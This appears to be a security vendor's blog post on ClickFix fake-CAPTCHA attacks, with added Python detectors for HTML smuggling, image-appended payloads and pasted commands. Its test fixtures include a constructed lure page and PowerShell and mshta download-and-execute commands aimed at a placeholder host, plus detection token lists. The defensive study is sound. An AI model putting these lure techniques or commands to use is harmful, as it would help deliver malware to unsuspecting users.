Sandbox malware detonation of a ClickFix attack with a fake CAPTCHA
“Now, here, you see, it takes all the running you can do, to keep in the same place. If you want to get somewhere else, you must run at least twice as fast as that!”
Lewis Carroll’s Red Queen perfectly encapsulates the current state of cybersecurity. As defenders strengthen their postures, threat actors adapt with equal fervor, creating an endless cycle of innovation and counter-innovation.
In 2025, this dynamic has never been more apparent than in the explosive evolution of ClickFix attacks.
Understanding ClickFix Attacks
What began as a relatively simple social engineering technique transformed into a sophisticated, multi-vector threat that has grown by an astounding 517% in just the first half of 2025 (ESET threat report H1 2025). For malware analysts, understanding this rapidly evolving attack vector is no longer optional: it’s essential for staying ahead in the Red Queen’s race.
ClickFix attacks arrive through malicious HTML attachments or websites. The hallmark of the method is a fake "fix" action: victims are urged to resolve a fabricated error or security problem by clicking a button that supposedly repairs, updates, or verifies something, or by copying a command the page offers them and running it themselves in a terminal.
Under the hood, these attacks often rely on:
- HTML smuggling: embedding malicious payloads directly inside HTML code.
- Obfuscated JavaScript: scripts that unpack or download the next stage when executed.
- Convincing UI elements: buttons styled to look like legitimate error dialogs or IT prompts.
The danger lies in its simplicity: victims are tricked into believing they are solving a problem, when in fact they are opening the door to compromise. Once the button is clicked, the chain can quickly deliver stealers, RATs, loaders, or even ransomware.
Notable examples include campaigns distributing RedLine Stealer and AsyncRAT, often through emails with seemingly harmless HTML attachments. Traditional email filters and endpoint security tools frequently fail to block these files because the malicious payload is hidden until the user actively interacts with it.
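To make the mechanics above concrete, here is a small static triage script. It is an added example, not part of the original post and not ANY.RUN tooling. It runs over a constructed lure page (the hostname example.invalid is a reserved placeholder, and the "payload" is a short stand-in string rather than a binary) and pulls out the two artefacts an analyst wants without opening the file in a browser: the command the fake button copies to the clipboard, and the base64 blob the page would write to disk through the Blob/createObjectURL download trick.

```python
"""Static triage of a ClickFix / HTML-smuggling lure without opening it.

Added example (not ANY.RUN code). Inputs are constructed: example.invalid is
a reserved placeholder hostname and SAMPLE_PAYLOAD stands in for an EXE/MSI.
"""
import base64
import hashlib
import re

# Constructed stand-in for the smuggled binary.
SAMPLE_PAYLOAD = b"MZ-demo payload"

# Constructed lure page: fake CAPTCHA, clipboard hijack, HTML-smuggled download.
SAMPLE_HTML = """<html><body>
<div id="captcha">Verify you are human</div>
<button onclick="fix()">I'm not a robot</button>
<script>
var b64 = "%s";
function fix() {
  navigator.clipboard.writeText("powershell -w hidden -c \\"iex (irm http://example.invalid/s)\\"");
  var bin = atob(b64), arr = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);
  var a = document.createElement('a');
  a.href = URL.createObjectURL(new Blob([arr], {type: 'application/octet-stream'}));
  a.download = 'update.exe'; a.click();
}
</script></body></html>""" % base64.b64encode(SAMPLE_PAYLOAD).decode()

# Markers of HTML smuggling (payload assembled client-side and auto-downloaded).
SMUGGLING_MARKERS = ("atob(", "Uint8Array", "Blob(", "createObjectURL", ".download")
# Markers of the ClickFix clipboard trick (page writes a command for the victim to paste).
CLIPBOARD_MARKERS = ("navigator.clipboard.writeText(", "execCommand('copy')", 'execCommand("copy")')
# Living-off-the-land tokens commonly seen in the pasted command (substring heuristics).
LOLBIN_TOKENS = ("powershell", "mshta", "-w hidden", "-windowstyle hidden", "iex", "irm",
                 "invoke-expression", "invoke-webrequest", "downloadstring", "-enc")

# First argument of writeText("..."), honouring backslash-escaped quotes.
_WRITETEXT_RE = re.compile(r'writeText\(\s*"((?:[^"\\]|\\.)*)"', re.S)
# Long base64 runs sitting in a quoted JS string literal.
_B64_RE = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')


def extract_clipboard_command(html: str):
    """Return the command the page copies to the clipboard, or None."""
    m = _WRITETEXT_RE.search(html)
    return m.group(1).replace('\\"', '"') if m else None


def extract_smuggled_payloads(html: str):
    """Decode every long base64 literal and describe it (size, leading bytes, SHA-256)."""
    found = []
    for b64 in _B64_RE.findall(html):
        try:
            data = base64.b64decode(b64, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        found.append({"size": len(data), "head": data[:7],
                      "sha256": hashlib.sha256(data).hexdigest()})
    return found


def triage(html: str) -> dict:
    """Summarise ClickFix / smuggling indicators for one HTML file."""
    command = extract_clipboard_command(html)
    lolbins = [t for t in LOLBIN_TOKENS if t in command.lower()] if command else []
    smuggling = sum(m in html for m in SMUGGLING_MARKERS) >= 3
    if command and lolbins:
        verdict = "clickfix-lure"
    elif smuggling:
        verdict = "html-smuggling"
    else:
        verdict = "clean"
    return {"html_smuggling": smuggling,
            "clipboard_hijack": any(m in html for m in CLIPBOARD_MARKERS),
            "clipboard_command": command,
            "lolbin_tokens": lolbins,
            "payloads": extract_smuggled_payloads(html),
            "verdict": verdict}


if __name__ == "__main__":
    for k, v in triage(SAMPLE_HTML).items():
        print(f"{k}: {v}")
```

Running it prints the verdict clickfix-lure, the decoded command and the SHA-256 of the decoded blob, which is the hash to pivot on in a sandbox or threat-intelligence lookup. The markers are heuristics: a page that splits the payload across several fragments, or reaches writeText through an alias, will need the patterns extended, which is exactly why interactive detonation remains the ground truth.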
A typical ClickFix attack can be seen in this malware sample analyzed in ANY.RUN's Interactive Sandbox.

2025: The Year of ClickFix Evolution
First detected in early 2024, ClickFix attacks initially focused on distributing basic Remote Access Trojans (RATs) like NetSupport RAT. However, the technique’s effectiveness quickly attracted more sophisticated threat actors. The Lampion banking trojan campaign, targeting Portuguese users through fake tax authority websites, demonstrated the technique’s potential for targeted, localized attacks.
More concerning was the adoption of ClickFix by state-sponsored groups, including Kimsuky (TA427), who weaponized the technique in highly targeted campaigns against think tanks and research organizations.
Over the last few months, researchers have observed several new tendencies shaping the evolution of ClickFix campaigns:
Advanced Evasion and Obfuscation
- Multi-stage Infection Chains: Complex delivery mechanisms with multiple obfuscation layers
- Steganography Integration: Hidden payloads within legitimate-looking images and documents
- Living-off-the-Land: Extensive use of legitimate system tools like PowerShell, WMI, and mshta.exe reduces the need for external binaries and helps attackers stay under the radar.
- Anti-Sandbox Techniques: Environmental awareness and sandbox detection capabilities
Cross-Platform Expansion
Originally Windows-focused, ClickFix attacks now target multiple operating systems. Campaigns now successfully compromise Windows, macOS, and even mobile platforms, with attackers developing platform-specific lures and payloads.
Abuse of Trusted Services
Attackers often hide payloads on legitimate platforms such as Google Drive, OneDrive, or Dropbox. Since connections to these domains are rarely blocked, malicious traffic blends seamlessly with normal activity.
Advanced HTML Smuggling
Scripts now use stronger obfuscation, encoding, or encryption to conceal payloads within HTML files. In some cases, payloads only materialize after user interaction, delaying detection even further.
Localized and Industry-Specific Lures
Campaigns are increasingly tailored by geography. For example, fake "system error" dialogs may appear in the local language, making the attack more believable. Attackers are also developing sector-specific campaigns: fake medical system errors and compliance notifications for healthcare, false security alerts and system maintenance notifications for government bodies, and so on.
MFA and Account Security Themes
Some ClickFix variants imitate multi-factor authentication issues, showing messages such as "Your 2FA is broken, click here to fix." This not only delivers malware but also harvests credentials.
Taken together, these trends point toward a clear trajectory: stealth, evasion, and trust exploitation. The core mechanic (pressuring a user into clicking) remains unchanged, but the infrastructure supporting it grows more sophisticated.
Leveraging ANY.RUN’s Interactive Sandbox for ClickFix Detection and Analysis
ANY.RUN’s Interactive Sandbox provides unparalleled capabilities for analyzing ClickFix attacks, offering malware analysts the tools necessary to dissect these complex, user-interaction-dependent threats.
For analysts, the biggest challenge is that ClickFix attacks require user interaction to fully reveal themselves. Automated tools may stop short of triggering malicious behavior, leaving defenders blind to real risk.
ANY.RUN's Sandbox allows analysts to replicate the exact steps a victim would take and safely expose the entire attack chain. Key features include:
- Interactive detonation: Analysts can manually click the "Fix" button, watching in real time as the malicious script unpacks itself.
- Network visibility: ANY.RUN automatically logs all outbound connections, whether to cloud storage services, command-and-control servers, or staging domains.
- IOC extraction: URLs, IP addresses, file hashes, and registry changes are collected automatically, ready for immediate integration into detection rules or threat intelligence feeds.
- Behavioral insights: Instead of a single verdict, users see how the malware behaves step by step, which is critical for understanding evasion and persistence techniques; process monitoring and file system changes are included.
- Memory Analysis Capabilities: ClickFix campaigns often employ in-memory execution and steganography techniques. ANY.RUN’s memory analysis features enable detection of hidden payloads in memory, fileless malware execution analysis, and identification of process hollowing and injection techniques.
- Steganography Detection: the Sandbox supports the analysis of embedded content from seemingly legitimate files. An analyst can identify unusual file entropy patterns and monitor for unexpected decode operations.
- Anti-evasion analysis: the Sandbox counters evasion techniques by adjusting the VM environment so that the malware's environmental checks pass. It supports the analysis of time-based delays and user-interaction requirements and lets analysts identify and work around geolocation-based restrictions.
- Collaboration and sharing: Findings can be easily shared across teams and organizations, accelerating collective defense.
Regarding ClickFix, this means analysts can quickly determine not just what malware was delivered, but how it was delivered, and which indicators point to ongoing campaigns.
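As a concrete version of the entropy and embedded-content checks mentioned above, the script below handles one common form of image steganography: a payload appended after the PNG's IEND chunk, where image viewers ignore it but a chunk walker can see it. It is an added example, not ANY.RUN's code; the image and the high-entropy "payload" are generated in code, so nothing here comes from a real campaign.

```python
"""Spotting a payload hidden behind a "legitimate" image: trailing data and entropy.

Added example (not ANY.RUN code). Builds a valid 1x1 PNG, appends
deterministic high-entropy bytes as a stand-in for a packed payload, and
shows how the appended data is found and scored.
"""
import hashlib
import math
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: length, tag, data, CRC32 over tag+data."""
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def make_png_1x1() -> bytes:
    """A valid 1x1 RGB PNG (constructed stand-in for a real lure image)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")            # filter byte + one red pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def pseudo_random_bytes(n: int, seed: bytes = b"clickfix-demo") -> bytes:
    """Deterministic high-entropy bytes standing in for an encrypted/packed payload."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def trailing_data(png: bytes) -> bytes:
    """Walk the chunk list and return whatever follows IEND (empty for a clean file)."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        tag = png[pos + 4:pos + 8]
        pos += 12 + length  # length + tag + data + crc
        if tag == b"IEND":
            return png[pos:]
    raise ValueError("truncated PNG: no IEND chunk")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for encrypted/compressed data, far lower for text or code."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def inspect(png: bytes, entropy_threshold: float = 7.0) -> dict:
    """Report trailing-data size and entropy and flag a likely appended payload."""
    tail = trailing_data(png)
    ent = shannon_entropy(tail)
    return {"trailing_bytes": len(tail), "entropy": round(ent, 2),
            "suspicious": len(tail) > 0 and ent > entropy_threshold}


if __name__ == "__main__":
    clean = make_png_1x1()
    stego = clean + pseudo_random_bytes(4096)
    print("clean:", inspect(clean))
    print("stego:", inspect(stego))
```

The check is deliberately narrow: it catches data appended after IEND, which is the cheapest way to ride a payload inside an image, but not data tucked into ancillary chunks (tEXt, zTXt) or spread across pixel bits. High entropy alone is also not proof, since a legitimately compressed trailer looks the same; what turns it into a finding is the sandbox showing a decode operation reading that region at run time.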
Detecting ClickFix with ANY.RUN Interactive Sandbox: New Wave Attack Use Case
The summer of 2025’s vacation season brought along a fake bookings ClickFix campaign. Forged Booking.com emails typically requested payment confirmation or additional service fees, urging victims to interact with malicious payloads.
ANY.RUN's analysts observed a number of attacks featuring fake payments, analyzed by users of the Interactive Sandbox. View one of the detonations.

A quick search in Threat Intelligence Lookup reveals a clear spike in activity during May-June. Use this search request to find related domains, IPs, and sandbox analysis sessions:
domainName:"booking." AND threatLevel:"malicious"

The most recent samples use the ClickFix scenario proper: a fake CAPTCHA tricks the victim into copying a PowerShell downloader and running it in a terminal.

The downloaded executables here belong to RAT malware families, giving attackers full remote access to infected systems.
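The step where the victim runs the pasted command is also the step most visible to endpoint telemetry. The detector below is an added example, not something from the post or from ANY.RUN. It runs over constructed Sysmon-style process-creation (event 1) and registry (event 13) records (the hostname example.invalid is a placeholder) and flags two things: a script host launched from an interactive parent with a download-and-execute command line, and the same kind of command landing in Explorer's RunMRU key, where Windows records what was typed into the Run dialog.

```python
"""Detecting the ClickFix execution step from endpoint telemetry.

Added example (not ANY.RUN code). EVENTS are constructed Sysmon-style records;
field names follow Sysmon's ProcessCreate (1) and RegistryEvent (13) schema.
"""
import re

# Constructed events. example.invalid is a reserved placeholder hostname.
EVENTS = [
    {"id": 1, "event": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/s)"'},
    {"id": 2, "event": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/check.hta"},
    {"id": 3, "event": 1, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"id": 4, "event": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": r"powershell -ep bypass -w hidden -c iwr http://example.invalid/x|iex\1"},
    {"id": 5, "event": 1, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --type=renderer"},
    {"id": 6, "event": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\b",
     "Details": r"notepad\1"},
]

# Interactive parents a pasted command is launched from (Run dialog = explorer.exe).
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "conhost.exe", "windowsterminal.exe")
# Script hosts and LOLBins that ClickFix commands typically start.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "certutil.exe")
# Download/execute and stealth tokens; each distinct hit counts once.
SUSPICIOUS_TOKENS = {
    "iex": r"\b(iex|invoke-expression)\b",
    "web-download": r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|certutil)\b",
    "hidden-window": r"-w(indowstyle)?\s+hidden",
    "encoded-command": r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{16,}",
    "policy-bypass": r"-(ep|executionpolicy)\s+bypass",
    "url": r"https?://",
    "hta": r"\.hta\b",
}
_TOKEN_RES = {name: re.compile(rx, re.I) for name, rx in SUSPICIOUS_TOKENS.items()}


def score_command(cmdline: str):
    """Return the names of suspicious tokens present in a command line."""
    return [name for name, rx in _TOKEN_RES.items() if rx.search(cmdline)]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert per event that matches the ClickFix execution pattern."""
    alerts = []
    for ev in events:
        if ev["event"] == 1:
            parent, child = _basename(ev["ParentImage"]), _basename(ev["Image"])
            hits = score_command(ev["CommandLine"])
            # Require an interactive parent, a script host, and at least two tokens:
            # a URL alone, or a hidden window alone, is common in benign admin use.
            if parent in INTERACTIVE_PARENTS and child in SCRIPT_HOSTS and len(hits) >= 2:
                alerts.append({"id": ev["id"], "rule": "interactive-parent-lolbin-download",
                               "tokens": hits})
        elif ev["event"] == 13 and "\\Explorer\\RunMRU\\" in ev["TargetObject"]:
            hits = score_command(ev["Details"])
            # Everything typed into Win+R is recorded here; a script host plus a
            # download token is the tell, and it survives even if the process exited.
            if hits and any(h in ev["Details"].lower() for h in ("powershell", "mshta", "cmd", "curl")):
                alerts.append({"id": ev["id"], "rule": "runmru-pasted-command", "tokens": hits})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Events 1, 2 and 4 fire; the scheduled backup (3), the browser renderer (5) and a benign Run entry (6) do not. The RunMRU rule is worth keeping separately from the process rule because it is a forensic artefact as well as a detection: it tells an incident responder what the user pasted even when process telemetry was not being collected at the time.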

To find more malware samples used in pseudo-Booking attacks, search TI Lookup for malicious domains that fake hotel booking confirmations:
domainName:"book*conf" AND threatLevel:"malicious"

Such lookups also help collect additional IOCs:

What's Next?
We expect ClickFix to evolve along several axes:
- AI-generated, dynamic lures: Messages and prompts that are personalized and adapt in real time, mimicking the user's context and language fluently.
- Wider SaaS abuse: More hosting on collaborative platforms and CDNs that defenders are reluctant to block.
- Supply chain integration: Software update mimicry, third-party service abuse, browser extension compromise.
- Cross-platform and mobile targeting: Expanding to macOS, iOS and Linux via browser-based vectors or platform-specific commands; Android expansion.
- Automated obfuscation: Payloads re-scrambled per delivery, reducing signature-based detection efficacy.
- Threat actor ecosystem development: ClickFix-as-a-Service; niche actor expertise developing along with cross-group collaboration (sharing of techniques between different threat actor groups).
Such evolution narrows the lead defenders have over attackers, making proactive tools and tactics all the more essential.
Strategic Considerations
The evolution of ClickFix attacks illustrates the critical importance of maintaining adaptive security postures. As threat actors continue to innovate, security teams must embrace continuous learning and technology advancement. Interactive sandbox environments like ANY.RUN fuel this adaptive approach, providing the detailed behavioral analysis capabilities necessary to understand and counter sophisticated social engineering attacks.
ClickFix attacks succeed not because of technical sophistication alone, but because they effectively exploit the intersection of technology and human psychology: a challenge that requires both technical excellence and deep behavioral insight to address effectively.
The stakes are high, but the tools and knowledge necessary for success are within reach for those willing to run twice as fast as the threats they face.